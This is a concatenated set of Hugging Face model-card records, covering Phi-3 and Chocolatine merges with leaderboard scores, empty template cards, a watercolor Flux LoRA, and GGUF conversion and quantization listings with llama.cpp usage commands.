This model was merged using the [task arithmetic](https://arxiv.org/abs/2212.04089) merge method using [jpacifico/Chocolatine-14B-Instruct-DPO-v1.2](https://huggingface.co/jpacifico/Chocolatine-14B-Instruct-DPO-v1.2) as a base.
### Models Merged
The following models were included in the merge:
* [failspy/Phi-3-medium-4k-instruct-abliterated-v3](https://huggingface.co/failspy/Phi-3-medium-4k-instruct-abliterated-v3)
### Configuration
The following YAML configuration was used to produce this model:
```yaml
models:
- model: jpacifico/Chocolatine-14B-Instruct-DPO-v1.2
parameters:
weight: 1.0
- model: failspy/Phi-3-medium-4k-instruct-abliterated-v3
parameters:
weight: 1.0
merge_method: task_arithmetic
base_model: jpacifico/Chocolatine-14B-Instruct-DPO-v1.2
parameters:
normalize: true
dtype: float16
```
# [Open LLM Leaderboard Evaluation Results](https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard)
Detailed results can be found [here](https://huggingface.co/datasets/open-llm-leaderboard/details_allknowingroger__Ph3task2-14B)
| Metric |Value|
|-------------------|----:|
|Avg. |28.25|
|IFEval (0-Shot) |47.13|
|BBH (3-Shot) |44.08|
|MATH Lvl 5 (4-Shot)|12.46|
|GPQA (0-shot) |10.74|
|MuSR (0-shot) |16.62|
|MMLU-PRO (5-shot) |38.44|
|
allknowingroger/Ph3della5-14B | allknowingroger | 2024-10-10T09:49:39Z | 5,386 | 0 | transformers | [
"transformers",
"safetensors",
"phi3",
"text-generation",
"mergekit",
"merge",
"conversational",
"custom_code",
"base_model:jpacifico/Chocolatine-14B-Instruct-DPO-v1.1",
"base_model:merge:jpacifico/Chocolatine-14B-Instruct-DPO-v1.1",
"base_model:jpacifico/Chocolatine-14B-Instruct-DPO-v1.2",
"base_model:merge:jpacifico/Chocolatine-14B-Instruct-DPO-v1.2",
"license:apache-2.0",
"model-index",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-09-05T16:24:51Z | ---
license: apache-2.0
library_name: transformers
tags:
- mergekit
- merge
base_model:
- jpacifico/Chocolatine-14B-Instruct-DPO-v1.2
- jpacifico/Chocolatine-14B-Instruct-DPO-v1.1
model-index:
- name: Ph3della5-14B
results:
- task:
type: text-generation
name: Text Generation
dataset:
name: IFEval (0-Shot)
type: HuggingFaceH4/ifeval
args:
num_few_shot: 0
metrics:
- type: inst_level_strict_acc and prompt_level_strict_acc
value: 47.99
name: strict accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=allknowingroger/Ph3della5-14B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: BBH (3-Shot)
type: BBH
args:
num_few_shot: 3
metrics:
- type: acc_norm
value: 48.41
name: normalized accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=allknowingroger/Ph3della5-14B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MATH Lvl 5 (4-Shot)
type: hendrycks/competition_math
args:
num_few_shot: 4
metrics:
- type: exact_match
value: 14.35
name: exact match
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=allknowingroger/Ph3della5-14B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: GPQA (0-shot)
type: Idavidrein/gpqa
args:
num_few_shot: 0
metrics:
- type: acc_norm
value: 12.3
name: acc_norm
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=allknowingroger/Ph3della5-14B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MuSR (0-shot)
type: TAUR-Lab/MuSR
args:
num_few_shot: 0
metrics:
- type: acc_norm
value: 14.36
name: acc_norm
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=allknowingroger/Ph3della5-14B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MMLU-PRO (5-shot)
type: TIGER-Lab/MMLU-Pro
config: main
split: test
args:
num_few_shot: 5
metrics:
- type: acc
value: 42.08
name: accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=allknowingroger/Ph3della5-14B
name: Open LLM Leaderboard
---
# merge
This is a merge of pre-trained language models created using [mergekit](https://github.com/cg123/mergekit).
## Merge Details
### Merge Method
This model was merged using the della_linear merge method using [jpacifico/Chocolatine-14B-Instruct-DPO-v1.2](https://huggingface.co/jpacifico/Chocolatine-14B-Instruct-DPO-v1.2) as a base.
### Models Merged
The following models were included in the merge:
* [jpacifico/Chocolatine-14B-Instruct-DPO-v1.1](https://huggingface.co/jpacifico/Chocolatine-14B-Instruct-DPO-v1.1)
### Configuration
The following YAML configuration was used to produce this model:
```yaml
models:
- model: jpacifico/Chocolatine-14B-Instruct-DPO-v1.2
parameters:
weight: 0.5
density: 0.8
- model: jpacifico/Chocolatine-14B-Instruct-DPO-v1.1
parameters:
weight: 0.5
density: 0.8
merge_method: della_linear
base_model: jpacifico/Chocolatine-14B-Instruct-DPO-v1.2
parameters:
epsilon: 0.05
lambda: 1
int8_mask: true
dtype: float16
tokenzer_source: union
```
# [Open LLM Leaderboard Evaluation Results](https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard)
Detailed results can be found [here](https://huggingface.co/datasets/open-llm-leaderboard/details_allknowingroger__Ph3della5-14B)
| Metric |Value|
|-------------------|----:|
|Avg. |29.92|
|IFEval (0-Shot) |47.99|
|BBH (3-Shot) |48.41|
|MATH Lvl 5 (4-Shot)|14.35|
|GPQA (0-shot) |12.30|
|MuSR (0-shot) |14.36|
|MMLU-PRO (5-shot) |42.08|
|
brownyeyez/Mixed-VNPTAI-Qwen2.5-1.5B-v12 | brownyeyez | 2024-10-10T09:48:29Z | 134 | 0 | transformers | [
"transformers",
"safetensors",
"qwen2",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T09:43:37Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
Trelis/Llama-3.2-1B-Instruct-touch-rugby-synth-1epochs-20241010-094100-distilled | Trelis | 2024-10-10T09:43:31Z | 128 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"trl",
"sft",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T09:42:52Z | ---
library_name: transformers
tags:
- trl
- sft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
bingbangboom/flux-waterscape | bingbangboom | 2024-10-10T09:41:20Z | 1,351 | 14 | diffusers | [
"diffusers",
"flux",
"lora",
"replicate",
"text-to-image",
"en",
"base_model:black-forest-labs/FLUX.1-dev",
"base_model:adapter:black-forest-labs/FLUX.1-dev",
"license:other",
"region:us"
] | text-to-image | 2024-10-09T10:34:12Z | ---
license: other
license_name: flux-1-dev-non-commercial-license
license_link: https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md
language:
- en
tags:
- flux
- diffusers
- lora
- replicate
base_model: black-forest-labs/FLUX.1-dev
pipeline_tag: text-to-image
instance_prompt: watercolor illustration in the style of WTRSCPE003
widget:
- text: "a cat in a field of lavender flowers, watercolor illustration in the style of WTRSCPE003"
output:
url: images/1.png
- text: "a girl wearing a flower crown, standing in a garden ,watercolor illustration in the style of WTRSCPE003"
output:
url: images/2.png
- text: "a white-haired young woman wearing a flower crown, a very large fiery dragon, castle in the background ,watercolor illustration in the style of WTRSCPE003"
output:
url: images/3.png
- text: "a big ferocious tiger, jungle, sunset, watercolor illustration in the style of WTRSCPE0033"
output:
url: images/4.png
- text: "a robot eating ramen in a busy cafe ,watercolor illustration in the style of WTRSCPE003"
output:
url: images/5.png
- text: "a seal holding a beach ball in a pool ,watercolor illustration in the style of WTRSCPE003"
output:
url: images/6.png
---
# flux_waterscape
<Gallery />
<table>
<tr>
<td><img src="./extras/1.png" alt="Example 1" style="width:100%;"></td>
<td><img src="./extras/2a.png" alt="Example 2" style="width:100%;"></td>
<td><img src="./extras/3.png" alt="Example 3" style="width:100%;"></td>
<td><img src="./extras/4a.png" alt="Example 4" style="width:100%;"></td>
</tr>
<tr>
<td><img src="./extras/5.png" alt="Example 5" style="width:100%;"></td>
<td><img src="./extras/6.png" alt="Example 6" style="width:100%;"></td>
<td><img src="./extras/7.png" alt="Example 7" style="width:100%;"></td>
<td><img src="./extras/8.png" alt="Example 8" style="width:100%;"></td>
</tr>
</table>
## Model description
Flux LoRA for creating watercolor styled illustrations. Use 'watercolor illustration in the style of WTRSCPE003' to trigger the model. Best with DEV (works well even with fp8). To use with flux1-dev-bnb-nf4 try increasing the LoRA strength (to say 1.3 and then adjust accordingly)
## Trigger words
You should use `watercolor illustration in the style of WTRSCPE003` to trigger the image generation.
## Download model
Weights for this model are available in Safetensors format.
[Download](/bingbangboom/flux-waterscape/tree/main) them in the Files & versions tab.
## Training at Replicate
Trained at Replicate using: https://replicate.com/ostris/flux-dev-lora-trainer/train
|
mmnga/tokyotech-llm-Llama-3.1-Swallow-70B-Instruct-v0.1-gguf | mmnga | 2024-10-10T09:34:20Z | 210 | 3 | null | [
"gguf",
"en",
"ja",
"dataset:TFMC/imatrix-dataset-for-japanese-llm",
"license:llama3.1",
"license:gemma",
"endpoints_compatible",
"region:us",
"imatrix",
"conversational"
] | null | 2024-10-10T01:38:48Z |
---
license:
- llama3.1
- gemma
language:
- en
- ja
datasets:
- TFMC/imatrix-dataset-for-japanese-llm
---
# tokyotech-llm-Llama-3.1-Swallow-70B-Instruct-v0.1-gguf
[tokyotech-llmさんが公開しているLlama-3.1-Swallow-70B-Instruct-v0.1](https://huggingface.co/tokyotech-llm/Llama-3.1-Swallow-70B-Instruct-v0.1)のggufフォーマット変換版です。
imatrixのデータは[TFMC/imatrix-dataset-for-japanese-llm](https://huggingface.co/datasets/TFMC/imatrix-dataset-for-japanese-llm)を使用して作成しました。
# convert
llama.cppで変換に失敗する場合は、[こちらの修正](https://github.com/ggerganov/llama.cpp/pull/9807/files)してみてください。
## Usage
```
git clone https://github.com/ggerganov/llama.cpp.git
cd llama.cpp
make -j
./llama-cli -m 'tokyotech-llm-Llama-3.1-Swallow-70B-Instruct-v0.1-Q4_0.gguf' -n 128 -c 128 -p 'あなたはプロの料理人です。レシピを教えて' -cnv
```
|
Trelis/Llama-3.2-1B-Instruct-touch-rugby-synth-1epochs-20241010-090135 | Trelis | 2024-10-10T09:27:49Z | 102 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"trl",
"sft",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T09:26:03Z | ---
library_name: transformers
tags:
- trl
- sft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf | RichardErkhov | 2024-10-10T09:21:35Z | 70 | 0 | null | [
"gguf",
"arxiv:2401.10225",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2024-10-10T05:53:12Z | Quantization made by Richard Erkhov.
[Github](https://github.com/RichardErkhov)
[Discord](https://discord.gg/pvy7H8DZMG)
[Request more models](https://github.com/RichardErkhov/quant_request)
llama-3-nvidia-ChatQA-1.5-8B - GGUF
- Model creator: https://huggingface.co/grimjim/
- Original model: https://huggingface.co/grimjim/llama-3-nvidia-ChatQA-1.5-8B/
| Name | Quant method | Size |
| ---- | ---- | ---- |
| [llama-3-nvidia-ChatQA-1.5-8B.Q2_K.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.Q2_K.gguf) | Q2_K | 2.96GB |
| [llama-3-nvidia-ChatQA-1.5-8B.IQ3_XS.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.IQ3_XS.gguf) | IQ3_XS | 3.28GB |
| [llama-3-nvidia-ChatQA-1.5-8B.IQ3_S.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.IQ3_S.gguf) | IQ3_S | 3.43GB |
| [llama-3-nvidia-ChatQA-1.5-8B.Q3_K_S.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.Q3_K_S.gguf) | Q3_K_S | 3.41GB |
| [llama-3-nvidia-ChatQA-1.5-8B.IQ3_M.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.IQ3_M.gguf) | IQ3_M | 3.52GB |
| [llama-3-nvidia-ChatQA-1.5-8B.Q3_K.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.Q3_K.gguf) | Q3_K | 3.74GB |
| [llama-3-nvidia-ChatQA-1.5-8B.Q3_K_M.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.Q3_K_M.gguf) | Q3_K_M | 3.74GB |
| [llama-3-nvidia-ChatQA-1.5-8B.Q3_K_L.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.Q3_K_L.gguf) | Q3_K_L | 4.03GB |
| [llama-3-nvidia-ChatQA-1.5-8B.IQ4_XS.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.IQ4_XS.gguf) | IQ4_XS | 4.18GB |
| [llama-3-nvidia-ChatQA-1.5-8B.Q4_0.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.Q4_0.gguf) | Q4_0 | 4.34GB |
| [llama-3-nvidia-ChatQA-1.5-8B.IQ4_NL.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.IQ4_NL.gguf) | IQ4_NL | 4.38GB |
| [llama-3-nvidia-ChatQA-1.5-8B.Q4_K_S.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.Q4_K_S.gguf) | Q4_K_S | 4.37GB |
| [llama-3-nvidia-ChatQA-1.5-8B.Q4_K.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.Q4_K.gguf) | Q4_K | 4.58GB |
| [llama-3-nvidia-ChatQA-1.5-8B.Q4_K_M.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.Q4_K_M.gguf) | Q4_K_M | 4.58GB |
| [llama-3-nvidia-ChatQA-1.5-8B.Q4_1.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.Q4_1.gguf) | Q4_1 | 4.78GB |
| [llama-3-nvidia-ChatQA-1.5-8B.Q5_0.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.Q5_0.gguf) | Q5_0 | 5.21GB |
| [llama-3-nvidia-ChatQA-1.5-8B.Q5_K_S.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.Q5_K_S.gguf) | Q5_K_S | 5.21GB |
| [llama-3-nvidia-ChatQA-1.5-8B.Q5_K.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.Q5_K.gguf) | Q5_K | 5.34GB |
| [llama-3-nvidia-ChatQA-1.5-8B.Q5_K_M.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.Q5_K_M.gguf) | Q5_K_M | 5.34GB |
| [llama-3-nvidia-ChatQA-1.5-8B.Q5_1.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.Q5_1.gguf) | Q5_1 | 5.65GB |
| [llama-3-nvidia-ChatQA-1.5-8B.Q6_K.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.Q6_K.gguf) | Q6_K | 6.14GB |
| [llama-3-nvidia-ChatQA-1.5-8B.Q8_0.gguf](https://huggingface.co/RichardErkhov/grimjim_-_llama-3-nvidia-ChatQA-1.5-8B-gguf/blob/main/llama-3-nvidia-ChatQA-1.5-8B.Q8_0.gguf) | Q8_0 | 7.95GB |
Original model description:
---
base_model:
- nvidia/Llama3-ChatQA-1.5-8B
license: llama3
language:
- en
pipeline_tag: text-generation
tags:
- nvidia
- chatqa-1.5
- chatqa
- llama-3
- pytorch
---
## Model Details
We introduce ChatQA-1.5, which excels at conversational question answering (QA) and retrieval-augumented generation (RAG). ChatQA-1.5 is built using the training recipe from [ChatQA (1.0)](https://arxiv.org/abs/2401.10225), and it is built on top of Llama-3 foundation model. Additionally, we incorporate more conversational QA data to enhance its tabular and arithmatic calculation capability. ChatQA-1.5 has two variants: ChatQA-1.5-8B and ChatQA-1.5-70B. Both models were originally trained using [Megatron-LM](https://github.com/NVIDIA/Megatron-LM), we converted the checkpoints to Hugging Face format.
## Other Resources
[ChatQA-1.5-70B](https://huggingface.co/nvidia/ChatQA-1.5-70B)   [Evaluation Data](https://huggingface.co/datasets/nvidia/ConvRAG-Bench)   [Training Data](https://huggingface.co/datasets/nvidia/ChatQA-Training-Data)   [Retriever](https://huggingface.co/nvidia/dragon-multiturn-query-encoder)
## Benchmark Results
Results in ConvRAG Bench are as follows:
| | ChatQA-1.0-7B | Command-R-Plus | Llama-3-instruct-70b | GPT-4-0613 | ChatQA-1.0-70B | ChatQA-1.5-8B | ChatQA-1.5-70B |
| -- |:--:|:--:|:--:|:--:|:--:|:--:|:--:|
| Doc2Dial | 37.88 | 33.51 | 37.88 | 34.16 | 38.9 | 39.33 | 41.26 |
